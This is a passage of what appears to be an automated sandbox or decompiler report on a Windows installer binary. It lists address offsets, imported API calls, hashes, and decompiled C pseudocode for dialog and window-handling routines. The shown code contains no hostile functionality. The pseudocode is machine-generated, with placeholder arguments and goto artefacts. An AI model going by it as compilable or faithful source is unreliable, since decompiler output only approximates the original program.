                                                                                    0x00404d3a
                                                                                    0x00404d48
                                                                                    0x00404d52
                                                                                    0x00404d5a
                                                                                    0x00404d61
                                                                                    0x00404d6c
                                                                                    0x00404d6c
                                                                                    0x00404d35
                                                                                    0x00404da4
                                                                                    0x00404da5
                                                                                    0x00404db1
                                                                                    0x00404db1
                                                                                    0x00404dbd
                                                                                    0x00404dd8
                                                                                    0x00404ddb
                                                                                    0x00404df8
                                                                                    0x00000000
                                                                                    0x00404ddd
                                                                                    0x00404de2
                                                                                    0x00404deb
                                                                                    0x0040517d
                                                                                    0x0040518f
                                                                                    0x0040518f
                                                                                    0x00404ddb
                                                                                    0x00000000
                                                                                    0x00404dbd
                                                                                    0x00404cf0

                                                                                    APIs
                                                                                    • GetDlgItem.USER32 ref: 00404B97
                                                                                    • GetDlgItem.USER32 ref: 00404BA4
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                                                    • LoadImageA.USER32 ref: 00404C0A
                                                                                    • SetWindowLongA.USER32 ref: 00404C24
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                                                    • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                                                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                                                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                                                    • DeleteObject.GDI32(00000110), ref: 00404C81
                                                                                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                                                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                                                    • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                                                      • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                                                    • GetWindowLongA.USER32 ref: 00404DC4
                                                                                    • SetWindowLongA.USER32 ref: 00404DD2
                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                                                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                                                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                                                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                                                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                                                    • GlobalFree.KERNEL32 ref: 00404FC0
                                                                                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                                                    • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                                                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
                                                                                    • ShowWindow.USER32(?,00000000), ref: 00405169
                                                                                    • GetDlgItem.USER32 ref: 00405174
                                                                                    • ShowWindow.USER32(00000000), ref: 0040517B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                    • String ID: $M$N
                                                                                    • API String ID: 2564846305-813528018
                                                                                    • Opcode ID: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
                                                                                    • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                                                    • Opcode Fuzzy Hash: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
                                                                                    • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 84%
                                                                                    			E00403CA7(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                    				struct HWND__* _v32;
                                                                                    				void* _v84;
                                                                                    				void* _v88;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				signed int _t35;
                                                                                    				signed int _t37;
                                                                                    				signed int _t39;
                                                                                    				struct HWND__* _t49;
                                                                                    				signed int _t68;
                                                                                    				struct HWND__* _t74;
                                                                                    				signed int _t87;
                                                                                    				struct HWND__* _t92;
                                                                                    				signed int _t100;
                                                                                    				int _t104;
                                                                                    				signed int _t116;
                                                                                    				signed int _t117;
                                                                                    				int _t118;
                                                                                    				signed int _t123;
                                                                                    				struct HWND__* _t126;
                                                                                    				struct HWND__* _t127;
                                                                                    				int _t128;
                                                                                    				long _t131;
                                                                                    				int _t133;
                                                                                    				int _t134;
                                                                                    				void* _t135;
                                                                                    				void* _t143;
                                                                                    
                                                                                    				_t116 = _a8;
                                                                                    				if(_t116 == 0x110 || _t116 == 0x408) {
                                                                                    					_t35 = _a12;
                                                                                    					_t126 = _a4;
                                                                                    					__eflags = _t116 - 0x110;
                                                                                    					 *0x42a878 = _t35;
                                                                                    					if(_t116 == 0x110) {
                                                                                    						 *0x42f428 = _t126;
                                                                                    						 *0x42a88c = GetDlgItem(_t126, 1);
                                                                                    						_t92 = GetDlgItem(_t126, 2);
                                                                                    						_push(0xffffffff);
                                                                                    						_push(0x1c);
                                                                                    						 *0x429858 = _t92;
                                                                                    						E0040417B(_t126);
                                                                                    						SetClassLongA(_t126, 0xfffffff2,  *0x42ec08);
                                                                                    						 *0x42ebec = E0040140B(4);
                                                                                    						_t35 = 1;
                                                                                    						__eflags = 1;
                                                                                    						 *0x42a878 = 1;
                                                                                    					}
                                                                                    					_t123 =  *0x40a1dc; // 0xffffffff
                                                                                    					_t134 = 0;
                                                                                    					_t131 = (_t123 << 6) +  *0x42f460;
                                                                                    					__eflags = _t123;
                                                                                    					if(_t123 < 0) {
                                                                                    						L34:
                                                                                    						E004041C7(0x40b);
                                                                                    						while(1) {
                                                                                    							_t37 =  *0x42a878;
                                                                                    							 *0x40a1dc =  *0x40a1dc + _t37;
                                                                                    							_t131 = _t131 + (_t37 << 6);
                                                                                    							_t39 =  *0x40a1dc; // 0xffffffff
                                                                                    							__eflags = _t39 -  *0x42f464;
                                                                                    							if(_t39 ==  *0x42f464) {
                                                                                    								E0040140B(1);
                                                                                    							}
                                                                                    							__eflags =  *0x42ebec - _t134; // 0x0
                                                                                    							if(__eflags != 0) {
                                                                                    								break;
                                                                                    							}
                                                                                    							__eflags =  *0x40a1dc -  *0x42f464; // 0xffffffff
                                                                                    							if(__eflags >= 0) {
                                                                                    								break;
                                                                                    							}
                                                                                    							_t117 =  *(_t131 + 0x14);
                                                                                    							E0040618A(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
                                                                                    							_push( *((intOrPtr*)(_t131 + 0x20)));
                                                                                    							_push(0xfffffc19);
                                                                                    							E0040417B(_t126);
                                                                                    							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                                                                    							_push(0xfffffc1b);
                                                                                    							E0040417B(_t126);
                                                                                    							_push( *((intOrPtr*)(_t131 + 0x28)));
                                                                                    							_push(0xfffffc1a);
                                                                                    							E0040417B(_t126);
                                                                                    							_t49 = GetDlgItem(_t126, 3);
                                                                                    							__eflags =  *0x42f4cc - _t134;
                                                                                    							_v32 = _t49;
                                                                                    							if( *0x42f4cc != _t134) {
                                                                                    								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                                    								__eflags = _t117;
                                                                                    							}
                                                                                    							ShowWindow(_t49, _t117 & 0x00000008);
                                                                                    							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
                                                                                    							E0040419D(_t117 & 0x00000002);
                                                                                    							_t118 = _t117 & 0x00000004;
                                                                                    							EnableWindow( *0x429858, _t118);
                                                                                    							__eflags = _t118 - _t134;
                                                                                    							if(_t118 == _t134) {
                                                                                    								_push(1);
                                                                                    							} else {
                                                                                    								_push(_t134);
                                                                                    							}
                                                                                    							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
                                                                                    							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
                                                                                    							__eflags =  *0x42f4cc - _t134;
                                                                                    							if( *0x42f4cc == _t134) {
                                                                                    								_push( *0x42a88c);
                                                                                    							} else {
                                                                                    								SendMessageA(_t126, 0x401, 2, _t134);
                                                                                    								_push( *0x429858);
                                                                                    							}
                                                                                    							E004041B0();
                                                                                    							E004060F7(0x42a890, E00403C88());
                                                                                    							E0040618A(0x42a890, _t126, _t131,  &(0x42a890[lstrlenA(0x42a890)]),  *((intOrPtr*)(_t131 + 0x18)));
                                                                                    							SetWindowTextA(_t126, 0x42a890);
                                                                                    							_push(_t134);
                                                                                    							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
                                                                                    							__eflags = _t68;
                                                                                    							if(_t68 != 0) {
                                                                                    								continue;
                                                                                    							} else {
                                                                                    								__eflags =  *_t131 - _t134;
                                                                                    								if( *_t131 == _t134) {
                                                                                    									continue;
                                                                                    								}
                                                                                    								__eflags =  *(_t131 + 4) - 5;
                                                                                    								if( *(_t131 + 4) != 5) {
                                                                                    									DestroyWindow( *0x42ebf8);
                                                                                    									 *0x42a068 = _t131;
                                                                                    									__eflags =  *_t131 - _t134;
                                                                                    									if( *_t131 <= _t134) {
                                                                                    										goto L58;
                                                                                    									}
                                                                                    									_t74 = CreateDialogParamA( *0x42f420,  *_t131 +  *0x42ec00 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131);
                                                                                    									__eflags = _t74 - _t134;
                                                                                    									 *0x42ebf8 = _t74;
                                                                                    									if(_t74 == _t134) {
                                                                                    										goto L58;
                                                                                    									}
                                                                                    									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                                                                    									_push(6);
                                                                                    									E0040417B(_t74);
                                                                                    									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
                                                                                    									ScreenToClient(_t126, _t135 + 0x10);
                                                                                    									SetWindowPos( *0x42ebf8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                                                                                    									_push(_t134);
                                                                                    									E00401389( *((intOrPtr*)(_t131 + 0xc)));
                                                                                    									__eflags =  *0x42ebec - _t134; // 0x0
                                                                                    									if(__eflags != 0) {
                                                                                    										goto L61;
                                                                                    									}
                                                                                    									ShowWindow( *0x42ebf8, 8);
                                                                                    									E004041C7(0x405);
                                                                                    									goto L58;
                                                                                    								}
                                                                                    								__eflags =  *0x42f4cc - _t134;
                                                                                    								if( *0x42f4cc != _t134) {
                                                                                    									goto L61;
                                                                                    								}
                                                                                    								__eflags =  *0x42f4c0 - _t134;
                                                                                    								if( *0x42f4c0 != _t134) {
                                                                                    									continue;
                                                                                    								}
                                                                                    								goto L61;
                                                                                    							}
                                                                                    						}
                                                                                    						DestroyWindow( *0x42ebf8);
                                                                                    						 *0x42f428 = _t134;
                                                                                    						EndDialog(_t126,  *0x429c60);
                                                                                    						goto L58;
                                                                                    					} else {
                                                                                    						__eflags = _t35 - 1;
                                                                                    						if(_t35 != 1) {
                                                                                    							L33:
                                                                                    							__eflags =  *_t131 - _t134;
                                                                                    							if( *_t131 == _t134) {
                                                                                    								goto L61;
                                                                                    							}
                                                                                    							goto L34;
                                                                                    						}
                                                                                    						_push(0);
                                                                                    						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
                                                                                    						__eflags = _t87;
                                                                                    						if(_t87 == 0) {
                                                                                    							goto L33;
                                                                                    						}
                                                                                    						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
                                                                                    						__eflags =  *0x42ebec - _t134; // 0x0
                                                                                    						return 0 | __eflags == 0x00000000;
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t126 = _a4;
                                                                                    					_t134 = 0;
                                                                                    					if(_t116 == 0x47) {
                                                                                    						SetWindowPos( *0x42a870, _t126, 0, 0, 0, 0, 0x13);
                                                                                    					}
                                                                                    					if(_t116 == 5) {
                                                                                    						asm("sbb eax, eax");
                                                                                    						ShowWindow( *0x42a870,  ~(_a12 - 1) & _t116);
                                                                                    					}
                                                                                    					if(_t116 != 0x40d) {
                                                                                    						__eflags = _t116 - 0x11;
                                                                                    						if(_t116 != 0x11) {
                                                                                    							__eflags = _t116 - 0x111;
                                                                                    							if(_t116 != 0x111) {
                                                                                    								L26:
                                                                                    								return E004041E2(_t116, _a12, _a16);
                                                                                    							}
                                                                                    							_t133 = _a12 & 0x0000ffff;
                                                                                    							_t127 = GetDlgItem(_t126, _t133);
                                                                                    							__eflags = _t127 - _t134;
                                                                                    							if(_t127 == _t134) {
                                                                                    								L13:
                                                                                    								__eflags = _t133 - 1;
                                                                                    								if(_t133 != 1) {
                                                                                    									__eflags = _t133 - 3;
                                                                                    									if(_t133 != 3) {
                                                                                    										_t128 = 2;
                                                                                    										__eflags = _t133 - _t128;
                                                                                    										if(_t133 != _t128) {
                                                                                    											L25:
                                                                                    											SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
                                                                                    											goto L26;
                                                                                    										}
                                                                                    										__eflags =  *0x42f4cc - _t134;
                                                                                    										if( *0x42f4cc == _t134) {
                                                                                    											_t100 = E0040140B(3);
                                                                                    											__eflags = _t100;
                                                                                    											if(_t100 != 0) {
                                                                                    												goto L26;
                                                                                    											}
                                                                                    											 *0x429c60 = 1;
                                                                                    											L21:
                                                                                    											_push(0x78);
                                                                                    											L22:
                                                                                    											E00404154();
                                                                                    											goto L26;
                                                                                    										}
                                                                                    										E0040140B(_t128);
                                                                                    										 *0x429c60 = _t128;
                                                                                    										goto L21;
                                                                                    									}
                                                                                    									__eflags =  *0x40a1dc - _t134; // 0xffffffff
                                                                                    									if(__eflags <= 0) {
                                                                                    										goto L25;
                                                                                    									}
                                                                                    									_push(0xffffffff);
                                                                                    									goto L22;
                                                                                    								}
                                                                                    								_push(_t133);
                                                                                    								goto L22;
                                                                                    							}
                                                                                    							SendMessageA(_t127, 0xf3, _t134, _t134);
                                                                                    							_t104 = IsWindowEnabled(_t127);
                                                                                    							__eflags = _t104;
                                                                                    							if(_t104 == 0) {
                                                                                    								goto L61;
                                                                                    							}
                                                                                    							goto L13;
                                                                                    						}
                                                                                    						SetWindowLongA(_t126, _t134, _t134);
                                                                                    						return 1;
                                                                                    					} else {
                                                                                    						DestroyWindow( *0x42ebf8);
                                                                                    						 *0x42ebf8 = _a12;
                                                                                    						L58:
                                                                                    						if( *0x42b890 == _t134) {
                                                                                    							_t143 =  *0x42ebf8 - _t134; // 0x0
                                                                                    							if(_t143 != 0) {
                                                                                    								ShowWindow(_t126, 0xa);
                                                                                    								 *0x42b890 = 1;
                                                                                    							}
                                                                                    						}
                                                                                    						L61:
                                                                                    						return 0;
                                                                                    					}
                                                                                    				}
                                                                                    			}































                                                                                    0x00403f27
                                                                                    0x00403f2d
                                                                                    0x00403f35
                                                                                    0x00403f3b
                                                                                    0x00403f41
                                                                                    0x00403f45
                                                                                    0x00403f4c
                                                                                    0x00403f4c
                                                                                    0x00403f4c
                                                                                    0x00403f56
                                                                                    0x00403f68
                                                                                    0x00403f74
                                                                                    0x00403f79
                                                                                    0x00403f83
                                                                                    0x00403f89
                                                                                    0x00403f8b
                                                                                    0x00403f90
                                                                                    0x00403f8d
                                                                                    0x00403f8d
                                                                                    0x00403f8d
                                                                                    0x00403fa0
                                                                                    0x00403fb8
                                                                                    0x00403fba
                                                                                    0x00403fc0
                                                                                    0x00403fd5
                                                                                    0x00403fc2
                                                                                    0x00403fcb
                                                                                    0x00403fcd
                                                                                    0x00403fcd
                                                                                    0x00403fdb
                                                                                    0x00403fec
                                                                                    0x00403ffd
                                                                                    0x00404004
                                                                                    0x0040400a
                                                                                    0x0040400e
                                                                                    0x00404013
                                                                                    0x00404015
                                                                                    0x00000000
                                                                                    0x0040401b
                                                                                    0x0040401b
                                                                                    0x0040401d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404023
                                                                                    0x00404027
                                                                                    0x0040404c
                                                                                    0x00404052
                                                                                    0x00404058
                                                                                    0x0040405a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404080
                                                                                    0x00404086
                                                                                    0x00404088
                                                                                    0x0040408d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404093
                                                                                    0x00404096
                                                                                    0x00404099
                                                                                    0x004040b0
                                                                                    0x004040bc
                                                                                    0x004040d5
                                                                                    0x004040db
                                                                                    0x004040df
                                                                                    0x004040e4
                                                                                    0x004040ea
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004040f4
                                                                                    0x004040ff
                                                                                    0x00000000
                                                                                    0x004040ff
                                                                                    0x00404029
                                                                                    0x0040402f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404035
                                                                                    0x0040403b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404041
                                                                                    0x00404015
                                                                                    0x0040410c
                                                                                    0x00404118
                                                                                    0x0040411f
                                                                                    0x00000000
                                                                                    0x00403e6f
                                                                                    0x00403e6f
                                                                                    0x00403e72
                                                                                    0x00403ea5
                                                                                    0x00403ea5
                                                                                    0x00403ea7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403ea7
                                                                                    0x00403e74
                                                                                    0x00403e78
                                                                                    0x00403e7d
                                                                                    0x00403e7f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403e8f
                                                                                    0x00403e97
                                                                                    0x00000000
                                                                                    0x00403e9d
                                                                                    0x00403ccb
                                                                                    0x00403ccb
                                                                                    0x00403ccf
                                                                                    0x00403cd4
                                                                                    0x00403ce3
                                                                                    0x00403ce3
                                                                                    0x00403cec
                                                                                    0x00403cf5
                                                                                    0x00403d00
                                                                                    0x00403d00
                                                                                    0x00403d0c
                                                                                    0x00403d28
                                                                                    0x00403d2b
                                                                                    0x00403d3e
                                                                                    0x00403d44
                                                                                    0x00403de7
                                                                                    0x00000000
                                                                                    0x00403df0
                                                                                    0x00403d4a
                                                                                    0x00403d57
                                                                                    0x00403d59
                                                                                    0x00403d5b
                                                                                    0x00403d7a
                                                                                    0x00403d7a
                                                                                    0x00403d7d
                                                                                    0x00403d82
                                                                                    0x00403d85
                                                                                    0x00403d95
                                                                                    0x00403d96
                                                                                    0x00403d98
                                                                                    0x00403dce
                                                                                    0x00403de1
                                                                                    0x00000000
                                                                                    0x00403de1
                                                                                    0x00403d9a
                                                                                    0x00403da0
                                                                                    0x00403db9
                                                                                    0x00403dbe
                                                                                    0x00403dc0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403dc2
                                                                                    0x00403dae
                                                                                    0x00403dae
                                                                                    0x00403db0
                                                                                    0x00403db0
                                                                                    0x00000000
                                                                                    0x00403db0
                                                                                    0x00403da3
                                                                                    0x00403da8
                                                                                    0x00000000
                                                                                    0x00403da8
                                                                                    0x00403d87
                                                                                    0x00403d8d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403d8f
                                                                                    0x00000000
                                                                                    0x00403d8f
                                                                                    0x00403d7f
                                                                                    0x00000000
                                                                                    0x00403d7f
                                                                                    0x00403d65
                                                                                    0x00403d6c
                                                                                    0x00403d72
                                                                                    0x00403d74
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403d74
                                                                                    0x00403d30
                                                                                    0x00000000
                                                                                    0x00403d0e
                                                                                    0x00403d14
                                                                                    0x00403d1e
                                                                                    0x00404125
                                                                                    0x0040412b
                                                                                    0x0040412d
                                                                                    0x00404133
                                                                                    0x00404138
                                                                                    0x0040413e
                                                                                    0x0040413e
                                                                                    0x00404133
                                                                                    0x00404148
                                                                                    0x00000000
                                                                                    0x00404148
                                                                                    0x00403d0c

                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                                                    • ShowWindow.USER32(?), ref: 00403D00
                                                                                    • DestroyWindow.USER32 ref: 00403D14
                                                                                    • SetWindowLongA.USER32 ref: 00403D30
                                                                                    • GetDlgItem.USER32 ref: 00403D51
                                                                                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                                                    • GetDlgItem.USER32 ref: 00403E1A
                                                                                    • GetDlgItem.USER32 ref: 00403E24
                                                                                    • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403E3E
                                                                                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
                                                                                    • GetDlgItem.USER32 ref: 00403F35
                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                                                    • EnableWindow.USER32(?,?), ref: 00403F68
                                                                                    • EnableWindow.USER32(?,?), ref: 00403F83
                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                                                    • EnableMenuItem.USER32 ref: 00403FA0
                                                                                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
                                                                                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                                                    • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                                                    • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 184305955-0
                                                                                    • Opcode ID: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
                                                                                    • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                                                    • Opcode Fuzzy Hash: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
                                                                                    • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 91%
                                                                                    			E004042E6(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                                    				intOrPtr _v8;
                                                                                    				signed int _v12;
                                                                                    				void* _v16;
                                                                                    				struct HWND__* _t52;
                                                                                    				long _t86;
                                                                                    				int _t98;
                                                                                    				struct HWND__* _t99;
                                                                                    				signed int _t100;
                                                                                    				intOrPtr _t107;
                                                                                    				intOrPtr _t109;
                                                                                    				int _t110;
                                                                                    				signed int* _t112;
                                                                                    				signed int _t113;
                                                                                    				char* _t114;
                                                                                    				CHAR* _t115;
                                                                                    
                                                                                    				if(_a8 != 0x110) {
                                                                                    					if(_a8 != 0x111) {
                                                                                    						L11:
                                                                                    						if(_a8 != 0x4e) {
                                                                                    							if(_a8 == 0x40b) {
                                                                                    								 *0x42985c =  *0x42985c + 1;
                                                                                    							}
                                                                                    							L25:
                                                                                    							_t110 = _a16;
                                                                                    							L26:
                                                                                    							return E004041E2(_a8, _a12, _t110);
                                                                                    						}
                                                                                    						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                                    						_t110 = _a16;
                                                                                    						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                                    							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                                    							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                                    							_v12 = _t100;
                                                                                    							_v16 = _t109;
                                                                                    							_v8 = 0x42e3c0;
                                                                                    							if(_t100 - _t109 < 0x800) {
                                                                                    								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                                    								SetCursor(LoadCursorA(0, 0x7f02));
                                                                                    								_push(1);
                                                                                    								E0040458A(_a4, _v8);
                                                                                    								SetCursor(LoadCursorA(0, 0x7f00));
                                                                                    								_t110 = _a16;
                                                                                    							}
                                                                                    						}
                                                                                    						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                                    							goto L26;
                                                                                    						} else {
                                                                                    							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                                    								SendMessageA( *0x42f428, 0x111, 1, 0);
                                                                                    							}
                                                                                    							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                                    								SendMessageA( *0x42f428, 0x10, 0, 0);
                                                                                    							}
                                                                                    							return 1;
                                                                                    						}
                                                                                    					}
                                                                                    					if(_a12 >> 0x10 != 0 ||  *0x42985c != 0) {
                                                                                    						goto L25;
                                                                                    					} else {
                                                                                    						_t112 =  *0x42a068 + 0x14;
                                                                                    						if(( *_t112 & 0x00000020) == 0) {
                                                                                    							goto L25;
                                                                                    						}
                                                                                    						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                    						E0040419D(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                    						E00404566();
                                                                                    						goto L11;
                                                                                    					}
                                                                                    				}
                                                                                    				_t98 = _a16;
                                                                                    				_t113 =  *(_t98 + 0x30);
                                                                                    				if(_t113 < 0) {
                                                                                    					_t107 =  *0x42ebfc; // 0x63d143
                                                                                    					_t113 =  *(_t107 - 4 + _t113 * 4);
                                                                                    				}
                                                                                    				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                                    				_t114 = _t113 +  *0x42f478;
                                                                                    				_push(0x22);
                                                                                    				_a16 =  *_t114;
                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                    				_t115 = _t114 + 1;
                                                                                    				_v16 = _t115;
                                                                                    				_v8 = E004042B1;
                                                                                    				E0040417B(_a4);
                                                                                    				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                                    				_push(0x23);
                                                                                    				E0040417B(_a4);
                                                                                    				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                    				E0040419D( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                                    				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                                    				E004041B0(_t99);
                                                                                    				SendMessageA(_t99, 0x45b, 1, 0);
                                                                                    				_t86 =  *( *0x42f434 + 0x68);
                                                                                    				if(_t86 < 0) {
                                                                                    					_t86 = GetSysColor( ~_t86);
                                                                                    				}
                                                                                    				SendMessageA(_t99, 0x443, 0, _t86);
                                                                                    				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                                    				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                                    				 *0x42985c = 0;
                                                                                    				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                                    				 *0x42985c = 0;
                                                                                    				return 0;
                                                                                    			}

                                                                                    APIs
                                                                                    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404371
                                                                                    • GetDlgItem.USER32 ref: 00404385
                                                                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
                                                                                    • GetSysColor.USER32(?), ref: 004043B4
                                                                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                                                    • lstrlenA.KERNEL32(?), ref: 004043D5
                                                                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                                                    • GetDlgItem.USER32 ref: 0040445B
